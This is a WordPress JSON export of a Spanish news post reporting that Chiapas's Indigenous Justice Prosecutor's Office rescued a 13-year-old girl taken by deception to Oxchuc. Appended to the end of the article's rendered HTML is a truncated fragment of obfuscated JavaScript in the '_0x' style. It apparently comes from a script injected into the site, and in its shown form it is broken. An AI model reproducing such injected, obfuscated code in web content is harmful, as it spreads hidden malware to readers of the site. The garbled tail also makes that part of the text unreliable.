{"id":21032,"date":"2025-03-24T03:20:36","date_gmt":"2025-03-24T03:20:36","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=21032"},"modified":"2025-03-24T03:20:36","modified_gmt":"2025-03-24T03:20:36","slug":"rescata-fiscalia-indigena-a-menor-de-13-anos-en-oxchuc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=21032","title":{"rendered":"Rescata Fiscal\u00eda Ind\u00edgena a menor de 13 a\u00f1os en Oxchuc"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"576\" height=\"1024\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250323-WA00281-1-576x1024.jpg\" alt=\"\" class=\"wp-image-21033\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250323-WA00281-1-576x1024.jpg 576w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250323-WA00281-1-169x300.jpg 169w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/03\/IMG-20250323-WA00281-1.jpg 720w\" sizes=\"auto, (max-width: 576px) 100vw, 576px\" \/><\/figure>\n\n\n\n<p>Yolanda Rodr\u00edguez\/ Corresponsal<\/p>\n\n\n\n<p>23 de marzo del 2025.- San Crist\u00f3bal de Las Casas.- La Fiscal\u00eda de Justicia Ind\u00edgena de Chiapas, que presiden el Dr. Lorenzo L\u00f3pez, en coordinaci\u00f3n con la Agencia de Investigaci\u00f3n e Inteligencia Ministerial, la Guardia Nacional y la Fuerza de Reacci\u00f3n Inmediata Pakal (FRIP), rescat\u00f3 a una menor de 13 a\u00f1os de edad que se encontraba en un domicilio de la comunidad de Mesbilja, en el municipio de Oxchuc.<\/p>\n\n\n\n<p>De acuerdo con las investigaciones, la menor, cuya identidad se mantiene resguardada, fue llevada con enga\u00f1os desde su comunidad de origen en San Juan Cancuc por un masculino. Tras labores de inteligencia y un operativo cuidadosamente coordinado, las autoridades lograron este s\u00e1bado ubicar y rescatar a la ni\u00f1a.<\/p>\n\n\n\n<p>La menor ser\u00e1 entregada sana y salva a sus padres, mientras la Fiscal\u00eda contin\u00faa las investigaciones para deslindar responsabilidades. La dependencia reafirm\u00f3 su compromiso de proteger los derechos de ni\u00f1as, ni\u00f1os y adolescentes en los pueblos ind\u00edgenas de Chiapas.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Yolanda Rodr\u00edguez\/ Corresponsal 23 de marzo del 2025.- San Crist\u00f3bal de Las Casas.- La Fiscal\u00eda de Justicia Ind\u00edgena de Chiapas, que presiden el Dr. Lorenzo L\u00f3pez, en coordinaci\u00f3n con la Agencia de Investigaci\u00f3n e Inteligencia Ministerial, la Guardia Nacional y la Fuerza de Reacci\u00f3n Inmediata Pakal (FRIP), rescat\u00f3 a una menor de 13 a\u00f1os de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":21033,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-21032","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21032","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=21032"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21032\/revisions"}],"predecessor-version":[{"id":21034,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/21032\/revisions\/21034"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/21033"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=21032"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=21032"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=21032"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}